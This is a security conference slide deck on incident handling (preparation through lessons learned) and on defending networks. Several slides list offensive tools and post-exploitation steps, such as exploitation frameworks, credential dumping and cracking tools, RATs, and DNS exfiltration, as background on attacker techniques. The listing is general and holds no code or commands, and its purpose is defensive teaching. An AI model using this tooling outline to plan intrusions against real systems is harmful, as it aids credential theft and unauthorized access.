The document outlines a comprehensive incident handling process for managing adverse events in information systems and networks, covering stages such as preparation, identification, containment, eradication, recovery, and lessons learned. It emphasizes the importance of policies, situational awareness, and technical controls against hacking and penetration tactics, detailing tools and techniques for vulnerability scanning, exploitation, and post-exploitation activities. Additionally, it highlights the necessity of continuous detection and response, as security breaches are inevitable.

1. Incident Handling, Hacker Techniques
and Countermeasures
José L. Quiñones, BSEET
MCSA, RHCSA, C|EH, C|ECI, C)PEH, C)M2I, GCIH, GPEN, HIT

2. Disclaimer
• I am not a lawyer, I don’t play one on TV and I don’t
pretend to be an expert in legal matter.
• If you require a legal opinion seek the services a of
lawyer proficient in Information Security laws and
regulations.
• All information contained here is the product of
personal research and experience in the fields of IT, HIT,
and Information Security.
• All copyrights of images and or references go to their
respective owners

3. Incident Handling
• It’s a plan to deal with the misuse of computer systems and
networks.
• Written procedures and policy to know what to do and how
to do it when it happens.
• An incident is an adverse “event” in the information systems
and/or network.

4. The Incident handling process
Preparation
Identification
Containment
Eradication
Recovery
Lessons Learn

5. Preparation
• Policies and Procedures
• Operational Controls
• Supplies (Software, Hardware, Notebook, ect)
• People (Team)
• Space (War Room)
• Secure Communications & Channels
• Drills, Practices, Training

6. Identification
• Be alert! maintain situational awareness and Communicate (Meet
often)
• Correlate
• Assign the primary and a sidekick
• Enforce “need to know” lockdown
• Sources
• Network, System & Application
• Look for suspicious events
• Establish chain of custody

7. Containment
• Collect Forensic Data
• Take control
• Stop the bleeding
• Stop attacker from getting deeper
• Characterize the incident
• Inform Management
• Track and Analyze
• Create ACLs, Patch, or Disconnect …

8. Eradication
• Determine cause of symptoms
• Implement appropriate remedies
• Remove malware or any other hacking tool
• Improve your defenses
• Restore from clean backups
• Do a Vulnerability Assessment

9. Recovery
• Get validation from business units
• Test operations
• Restore Operations
• Monitor
• Look for “stuff” to come back

10. Lessons Learned
• Review the data
• How everyone performed?
• What was the impact on the company?
• Did the controls worked?
• Where the policies and procedures enough?
• Follow up report and meet with the team
• Make any modifications to existing controls and/or implement new
ones.

11. What are you defending from?

12. … from Hacking, Penetration, Breach!
• Reconnaissance/OSINT
• Scanning / Enumeration
• Gaining Access / Exploitation
• Post-exploitation/Loot/Escalate
• Covering Tracks / Cleanup
------
• Reporting (only on sanctioned attacks or exercises)

13. Reconnaissance/OSINT
Open Source Intelligence is a term used to refer to the data
collected from publicly available sources to be used in
an intelligence context. In the intelligence community, the
term "open" refers to overt, publicly available sources (as
opposed to covert or clandestine sources).
The Tools
• https://inteltechniques.com/links.html
• Recon-ng
• The Harvester
• GHDB

14. Scanning / Enumeration
• Active Directory
• powershell (Get-ADComputer)
• wmi
• DNS
• dnsrecon/denenum
• Network
• nmap
• ping/traceroure/arp
• Frameworks (scripts)
• Redhawk/Sn1per

15. Vulnerability Scanning
Automated
• Nessus
• Nexposed
• OpenVAS
• Nmap scripts
• Qualys
• Wpscan
• Nikto
Manual
• Acunetix
• National Vulnerability DB
• CVE = mitre.org
• Fuzzing

16. Exploitation
• Metasploit Framework
• Powershell Empire
• Offensive Security Exploit DB/searchploit
• Packetstorm Security

17. Post-exploitation
• Loot
• Take files and any information
• Dump credentials
• hashes/tokens/password
• Crack passwords
• hashcat/oclhashcat
• john the Ripper
• Ophcrack/rainbowcrack
• Pivot
• Lateral movement

18. APT Style
• RATs are common and NOT
very sophisticated
• DNS exfiltration
• Encryption is the standard,
SSL/TLS tunneling
• They use system tools to
maintain under the radar

19. Living of the land …
• Old fashion CLI tools
• tasklist
• taskkill
• net
• netsh
• ipconfig
• netstat
• WMI
• wmic
• Powershell

20. Remote Access Trojan/Remote Administration
Tools (RATs)
• Poison Ivy
• Pupy.py
• Sakula
• ncat/netcat/cryptcat
• Cobalt Strike Beacon
• Metasploit Meterpreter

21. This is the reality …
• Breaches are going to happen, Zer0-days exist
• Detect and respond as fast as possible
• Detection only works in a low noise environment
• Visibility and skill are key in managing an event

22. What do I do?

23. De.fend /dəˈfend/
resist an attack made on (someone or something); protect from harm or danger.

24. Defending
• Network Segmentation
• Subnetting
• ACLs
• Security Zones
• Management Network
• Server Farms
• Perimeter/Core Firewall
• Use IPS, IDS, AV and other features of your hardware
• Create chokepoints and monitor them

25. Use a Tier system (ie.Microsoft PAWS)

26. Silo the data
• Use data classification to identify your resources
• Maintain similar data in the same silo, do NOT mix them
• Create controls to protect those boundaries
• Apply separation of duties and least privilege principles

27. De.tect /dəˈtekt/
• discover or identify the presence or existence of.
• discover or investigate (a crime or its perpetrators).
• discern (something intangible or barely perceptible).

28. Detect!
• DNS
• Passive DNS Data
• Windows Events
• Windows Event Collector
• Group Policy Object (Audits)
• Sysinternals Sysmon
• Syslog
• Switches, Routers, Firewalls
• Network
• Net Flows
• Packet Capture
• Snort/Bro IDS

29. … and what do I do with all that
data?

30. Elastic Search
Log Stash
Kibana

32. Re·spond /rəˈspänd/
reply to, make a response to,react.

33. STOP!

35. Document everything …

37. Conclusion …

38. Questions?

39. Thanks!
• josequinones@codefidelio.org
• @josequinones
• http://codefidelio.org
• jquinones@obsidisconsortia.org
• @obsidis_NGO
• http://obsidisconsortia.org